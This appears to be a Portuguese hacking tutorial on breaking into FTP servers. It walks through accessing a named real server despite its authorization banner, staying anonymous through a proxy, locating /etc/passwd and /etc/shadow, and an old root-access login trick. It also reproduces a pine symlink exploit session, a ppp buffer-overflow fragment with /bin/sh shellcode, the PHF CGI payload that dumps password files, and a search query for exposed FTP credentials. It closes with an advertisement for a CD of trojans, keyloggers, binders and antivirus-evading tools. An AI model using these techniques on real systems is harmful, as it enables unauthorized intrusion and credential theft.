Escolar Documentos
Profissional Documentos
Cultura Documentos
? (D$) Invadindo Um Servidor FTP PDF
? (D$) Invadindo Um Servidor FTP PDF
O que é FTP
- Conceitos básicos
- Cliente/Servidor
- Porta padrão
- Como conectar
- Comandos
- TraDução de nome de arquivos
- Mensagens FTP
Servidor alvo
- Sobre o servidor que envia dados para NASA
FTP UNIX
- Usuários
- Navegação
- Principais comandos UNIX
- Modificando os permissões
- Principais diretórios
- Senhas e Exploits
- Login anônimo
- Logar como root
- Diretório das senhas
- Decriptografando uma senha
- Quebrando uma senha
- Exploits UNIX
- BuG DE PHF
- Principais Falhas de FTP
PREFÁCIO
Rackerox
rackerox@hotmail.com
O QUE É FTP
FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma
bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet.
Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site
na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu
computador.
Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais
se você estiver logado o FTP você poderá mudar os arquivos
Cliente / Servidor
Sem complicar...o conceito é simples:
Cliente é o seu programa de ftp que esta no seu computador.
Servidor é o que está hospedado junto com o site.
(você também pode criar um servidor em seu computador)
O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor
e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor
cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo
transferido. Estes dados são transferidos do servidor para o cliente e vice e versa.
Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O
encerramento da conexão indica o fim do arquivo.
Porta padrão
A porta padrão para FTP é a porta 21
Como conectar
Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor
programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando,
funcionam no MS-DOS ou no Prompt de Comando no windows.
Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este
programa não tem interface gráfica, ele roda no Prompt de comando.
Para abrir o prompt de comando vá em executar e digite cmd.
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você
esta com o programa aberto, é preciso aprender os comandos.
Comandos FTP
Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos
hospedados.
COMANDO SINTAXE DESCRIÇÃO
Executa COMANDO na máquina local.
No prompt do ftp, os comandos digitados são, a princípio,
! ! COMANDO
executados na máquina remota. Para executar um comando na
máquina local preceda o mesmo com o !
Configura o tipo de transferência de arquivos para ASCII. É o valor
ascii ascii
padrão
bell bell Emite um bip quando um comando é completado
binary binary Configura o tipo de transferência de arquivos para binário.
bye bye Encerra a sessão ftp e retorna ao interpretador de comandos
cd cd DIRETÓRIO Muda o diretório de trabalho para DIRETÓRIO
cdup cdup Muda para o diretório que está um nível acima do diretótio atual
chmod chmod MODO ARQUIVO Altera as permissões de ARQUIVO de acordo com MODO.
close close Encerra a sessão ftp e retorna ao interpretador de comandos
delete delete ARQUIVO Apaga ARQUIVO
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
dir dir DIRETÓRIO ARQUIVO-LOCAL DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
Baixa ARQUIVO-REMOTO para sua máquina com o nome de
get ARQUIVO-REMOTO ARQUIVO-
get ARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o
LOCAL
arquivo será baixado com o mesmo nome que tem na máquina remota.
Descreve sumariamente o COMANDO. Se este não for especificado
help help COMANDO
será exibida a lista de todos os comandos.
lcd lcd DIRETÓRIO Muda o diretório de trabalho na máquina local.
Lista o conteúdo de DIRETÓRIO colocando o resultado em
ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se
ls ls DIRETÓRIO ARQUIVO-LOCAL DIRETÓRIO não for especificado, será listado o conteúdo do
diretório atual. Se ARQUIVO-LOCAL não for especificado a
listagem será enviada para a tela.
mdelete mdelete ARQUIVOS Apaga ARQUIVOS
mdir DIRETÓRIOS ARQUIVO-
mdir Semelhante a dir, porém lista o conteúdo de vários diretórios
LOCAL
mget mget ARQUIVOS Semelhante a get, porém baixa vários arquivos
mkdir mkdir DIRETÓRIO Cria um diretório com o nome de DIRETÓRIO
mls DIRETÓRIOS ARQUIVO-
mls Semelhante a ls, porém lista o conteúdo de vários diretórios
LOCAL
Configura o modo de transferência de arquivos para MODO. O modo
mode mode MODO
padrão é "stream"
modtime modtime ARQUIVO Exibe a hora da última modificação de ARQUIVO
mput mput ARQUIVOS Semelhante a put, porém envia vários arquivos
newer ARQUIVO-REMOTO Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora
newer
ARQUIVO-LOCAL de modificação do ARQUIVO-REMOTO for mais recente
nlist DIRETÓRIOS ARQUIVO-
nlist Semelhante a nls
LOCAL
Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como
put ARQUIVO-LOCAL ARQUIVO- ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for
put
REMOTO especificado o arquivo será enviado com o nome de ARQUIVO-
LOCAL
pwd pwd Exibe o caminho completo(PATH) do diretório atual
quit quit Semelhante a bye
recv recv ARQUIVO-REMOTO Semelhante a get
ARQUIVO-LOCAL
Semelhante a get com a diferença que se ARQUIVO-LOCAL existe
reget ARQUIVO-REMOTO e é menor que ARQUIVO-REMOTO, reget considera que
reget ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente
ARQUIVO-LOCAL
transferido e contiua a transferência do arquivo. Muito útil quando se
baixa arquivos grandes.
remotehelp remotehelp COMANDO
Semelhante a help, porém solicita ajuda ao servidor ftp
rhelp rhelp COMANDO
remotestatus remotestatus ARQUIVO Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado,
rstatus rstatus ARQUIVO exibe a situação da máquina remota.
rename NOME-ANTIGO NOME-
rename Renomeia um arquivo
NOVO
rmdir rmdir DIRETÓRIO Apaga DIRETÓRIO
send ARQUIVO-LOCAL ARQUIVO-
send Semelhante a put
REMOTO
size size ARQUIVO Exibe o tamanho de ARQUIVO
status status Exibe a situação atual do servidor ftp
system system Exibe o tipo de sistema operacional da máquina remota
Configura o tipo de transferência de arquivos para TIPO. O padrão é
type type TIPO ASCII. Se TIPO não for especificado, será mostrada a configuração
atual
? ? COMANDO Semelhante a help
Mensagens FTP
O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário
(sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226
Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet,
respectivamente.
SERVIDOR ALVO
Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas
proteções, mas adiante vocês vão perceber.
Vamos ver passo a passo como chegar até os arquivos de dentro do servidor.
Site alvo: http://ned.ipac.caltech.edu/
Clique em START
Observe:
Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles
deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar:
“If you are not authorized to access this system, disconnect now.”
Procure na pasta “msgs” que você vai localizar o banner.txt
Vantagem de visializar FTP primeiro no Webexploiter.
Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um.
Quando você entra com o Webexploiter você conecta via Proxy.
O seu IP passa a ser: 67.15.221.2
City: Houston
State: TX
Country: US
Postal code: 77060
Area code: 281
Lá no Texas, bem longe da sua casa.
Alem do FTP, o Ping e o Port Scan não partem de seu computador.
Da para você vasculhar o servidor no anonimato.
Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é
outra historia.
Visualizando os arquivos do FTP diretamente de
seu computador
Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um
login de UNIX que funciona, mas tem permissão restrita.
A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de
Comando.
Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem:
Agora digite:
quote user ftp
Observe, ele aceita este usuário e pede o Password
Agora digite:
quote pass ftp
Olha que bunito xD, você esta dentro do servidor da NASA.
Definindo um diretório local
Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de
FTP baixar e enviar os arquivos.
-Crie uma pasta no seu desktop (eu criei a pasta “rox”)
Agora vamos definir este diretório como diretório local.
Use o comando lcd
Agora digite
lcd Desktop
lcd rox
Listando Diretorios
Primeiro vamos usar o comando dir
Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP
do windows.
O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para
aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai
conseguir. Só com outro login.
Visualizando o arquivo do Banner
Lembra da mensagem do servidor?
Esta aqui:
Vamos traduzir:
*------------------------------------------------------------------------
* Este computador é financiado pelo Governo dos Estados Unidos
* E operado pelo California Institute of Technology
* De apoio ao curso U.S. Government programas e atividades.
* Ao continuar, você concorda com os dados que voce digitar
* Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de
* Privacidade.
* Se você não está autorizado a acessar a este sistema, desconecte agora.
*------------------------------------------------------------------------
Analisando os arquivos
Eu analisei os arquivos do servidor e não achei nada de interessante.
Só tem dados de satélite, telescópio estudos de física.
Se fosse na guerra fria até dava para vender para União Soviética rsrs.
Mas da para estudar e estrutura de diretórios e arquivos UNIX
Olhem as extensões que mais aparecem.
.dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de
telescópio, satélite,sei la.
Eu renomei um deles para .txt , tinha isto:
File Name: .dat, Processing Time: Thu Feb 8 04:30:00
Output option: compact_2
************************** SEARCH REQUESTS ******************************
IN_CSYS : equatorial , IN_EQUINOX : J2000.0
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0
EXTENDED_NAME_SEARCH: Yes
SORTED_BY_FIELD : Distance_to_search_center
REDSHIFT_VELOCITY : 10000.0
DEFAULT_RADIUS : 1.000000
DEFAULT_BEGIN_YEAR : 1900
DEFAULT_END_YEAR : 2006
IAU NAME STYLE :S
NEARPOSN:
1.4514872000d ; 54.55719600 ; 1.00
Much care has gone into the collection of POSITIONS and VELOCITIES in
NED, and they are carried along with uncertainties and references to
their origin. These are continually over-written by more accurate
values as they become available.
Field 1: Morphology
Field 2: A magnitude in the visible range, on any scale as available
Field 3: Major axis diameter in arcmin
Field 4: Minor axis diameter in arcmin
Restrições
Quando logamos apareceu a mensagem:
(restrições aplicadas)
ENTENDENDO OS COMANDOS
O protocolo FTP se baseia em comandos e respostas.
Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso
computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A)
Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta.
Formato da resposta:
220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A>
220 (código de retorno)
ASCII 32 - 0x20 (espaço em branco)
ASCII 10 - 0x0A (uma linha nova)
Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão.
220-<Espaço>Resposta (Linha 1)<LineFeed>
220-<Espaço>Resposta (Linha 2)<LineFeed>
Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D)
imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para
sinalizar que é a última linha da resposta.
Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta
LOGANDO no SISTEMA
Os comandos são simples user (para usuário) e (pass para senha)
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos
diretamente para o servidor utilizando o comando quote
quote user seuusuario
quote pass suasenha
Você também pode tentar explorar uma falha antiga, mas só funciona com servidores
antigos.quando aparecer para logar digite isto:
quote user ftp
depois
quote cwd ~root ou quote cwd~sys quote cwd~sysop
depois
quote pass ftp
O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste
caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que
quiser no servidor, terá permissão para tudo, inclusive para ser preso =)
SISTEMA OPERACIONAL
Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar
o comando syst , como é um comando direto vamos usar quote syst
CONEXÃO DE DADOS
Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for
baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto.
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando
direto ao servidor teremos que estabelecer quais serão as portas que iremos usar.
Vamos usar o comando port
O “port” indica ao servidor quais portas serão usadas na conexão
Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP.
Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho
complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo:
Xxxxx
Exemplo do comando port
Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai
você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o
comando pasv
Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta.
Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo.
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201).
HELP
Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor,
mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os
comandos do servidor digite quote help
Depois só voce apertar enter que você estará logado, observe a imagem.
Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do
quote, e também que aqueles comandos do programa de FTP não funcionará aqui.
Aqui só vão funcionar os comandos do servidor.
A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo.
Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no
prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem
saberá.
FTP UNIX
A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX.
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP
USUÁRIOS
NAVEGAÇÃO
Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas
ao contrario do MS-DOS)
O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de \ )
ls –l (mostra as permissões)
exemplo:
drw-r--r-- root root 10000 1 de abril etc
d - directory
r - read - so pode ver, dar download, etc...
w - write - pode editar, gravar...
x - execute - eh um executavel ou um script (tipo .BAT do DOS)
who ( mostra quem está conectado no server, para mandar uma mensagem utilize write
nomedouser)
MODIFICANDO AS PERMISSÕES
ls -l teste.txt
-rw-r--r-- LoKi LoKi 34 teste.txt
chmod g+w teste.txt ---> muda o acesso do Group para +write
ls -l teste.txt
-rw-rw-r-- LoKi LoKi 34 teste.txt
resumindo:
o - para Owner
g - para o Grupo
u - para todos Usuários
PRICIPAIS DIRETORIOS
/etc/passwd
Neste diretório estão contidos:
Usuários, Senhas , Ids
Abra o arquivo passwd, dependendo da sua permissão aparecera:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
ou
zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh
(username:Password:id:uid:mini descrição:diretório de trabalho:'command.com')
Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso
você pode logar anônimo com qualquer password)
Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu,
entre logado com ele.
Mas se a senha esta ai, porque não entrar com ela agora?
Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar.
Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as
senhas estão em um outro lugar. Normalmente em
/etc/shadow, e as vezes ela esta -r (No read) para os Users normais.
Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las.
O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para
você. Normalmente /etc/shadow está escondido como /etc/.shadow
Diretórios que começam com ponto “.” São diretórios ocultos.
Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar
com outro nome.
/etc/shadow
podem conter senhas como vimos anteriormente
/etc/group
Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
/usr/adm/loginlog
Aqui ficam os Logs, horários de entradas e saídas dos usuários.
As vazes podem estar em /usr/adm/acct/loginlog
E as vezes nem é encontrado, alguns servidores desativam este serviço.
/usr/mail/<nomedousuario> :
Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de
ser o root ou o próprio usuário.
/upload ou /cache
Aqui ficam gravados arquivos temporários que os usuários ou mesmo o
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou
a cada semana. Em muitos servers nao existe esse diretório.
/bin :
Neste diretório ficam os comandos do server e as shells. Cuidado.
SENHAS E EXPLOITS
Login anônimo
user: anonymous
pass: eu@dominio
Exploits UNIX
Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é
impossível você entender um exploiter se você não souber programar.
Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te
levando á root.
Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT
Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela
de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" >
/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00
grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui.
Exploitation script para vunerabilidade ppp.
main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
int i,j;
buf = malloc(4096);
i = BUFFER_SIZE-strlen(execshell);
addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET;
BUG de PHF
Este exploit é muito antigo, muito dificio achar um servidor desatualizado.
Basta colocar o exploit no seu navegador.Exploit:
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo:
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Principais Falhas de FTP
- Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas
faciomente com um sniffer.
- Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google
consegue localizar estes arquivos, por exemplo:
Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos.
- Tem gente que ainda deixa root sem senha
- Como os navegadores interagem com FTP, link de download direto, você pode invadir um
FTP e “linkar” os arquivos para download, tipo:
ftp://dominio/diretorios/arquivo
Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root
Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar
informação.
Se quiserem entrar em contato comigo para tirar alguma dúvida:
Email:
rackerox@webexploiter.com
MSN
rackerox@hotmail.com
Praga de Orkut:
http://www.orkut.com/Profile.aspx?uid=4380671928865807152
CD ROOM HACKING TOOLS
O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática.
Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação,
Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os
tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba
senha com KL e invadir por cookies =)
No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu
funcionamento.
www.cdhackingtools.com
Conteudo do CD:
Redes/Internet
-Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta
-Programas para conexão remota ( com suporte para diferentes roteadores )
-Faça uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou através da Internet.
-Altere o seu endereço MAC
-Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email.
-Verifique o status de qualquer servidor na internet
-Faça do seu computador um servidor de internet.
-Capture todas as informações do tráfego de sua rede/conexão.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de
wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... são vários programas de snifers, scans, telnet, etc.
Exploiters/Scans
Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das
vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos
(ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas.
Trojans Backdoors
Um meio secreto ou não documentado de invadir um sistema de computador .
Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma
porta para um possível invasor.
Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro
arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir
deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas
operações no computador da vítima.
Resumindo :
Servidor é o vírus trojan que vai se instalar no pc da vítima
Cliente é o programa que esta no seu pc
E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP
Keyloggers
Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo
o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a
um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
Bruteforces
(Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação
destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja
encontrado.Ferramentas para força bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom
IP Scans
Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica.
Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas
portas. Faça scans até de IP que não respondem ao ping.
Procure trojans instalados em uma determinada faixa de IP.
Nuckers
Nuke é o nome atribuído a programas que finalizam
prematuramente com uma conexão TCP através do envio
de pacotes ICMP com mensagens de erro. Tais pacotes
podem ser direcionadas para o servidor (server side nuke)
ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com a
conexão fazendo com que o cliente ou o servidor sejam
enganados por uma mensagem de erro que normalmente
indicaria um problema de conexão entre os dois.
Binders
Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila
a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e
personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são
automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a
sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado
Criptografia
Programas de codificação e Decodificação de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.
Programaçao
O CD contem varias ferramentas de programação.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalação etc.
Compiladores
Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em
linguagem de máquina, gerando o binário que pode ser executado.
No CD contem compiladores de C C++ Assesmbler Perl
Resource
Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode
mudar caixas de diálogo, ícones e outras coisas.
Conversores
Corverta vários formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash,
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).
Compressores
Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional
permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o
antivirus não detecte.
Compactadores
São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No
cd contem os programas Winrar, Winzip e UPX
Ferramentas web
Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .
Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco,
manutenção do sistema, proteção de arquivos, etc.
Vírus
Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de
acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus
Builders, arquivos de batch.
Msn/orkut
São mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vídeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood.
Faça um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibição, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automática quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de
pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.
Servidores
Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,
SSH e PERL.
Hospede seu site em seu próprio computador.
Clientes
Programas que acessam os serviços de um servidor. Telnet, SSH
Segurança
Programas para ajudar na sua segurança, não um kit de anti vírus.
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares,
Monitore a segurança de seu computador à distancia.
Crie um emulador de terminal Telnet e SSH.
Ferramentas gerais
Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan,
gerenciador de uploads
Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windows
Sistemas operacionais
Programas que rodam do pen drive
Códigos fontes do:
Secure Internet Communication Suíte.
Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
EQUIPE HALL OF HACKERS
A Hall of Hackers foi criada em dezembro de 2006.
Nosso intuito NÃO é promover nenhum tipo de prática maliciosa.
O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall
of Hackers somos inteiramente a favor da liberdade de informação.
Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou
seja, quem realmente estuda.
Nossa comunidade
http://www.orkut.com/Community.aspx?cmm=22006772
NOSSOS PROGETOS: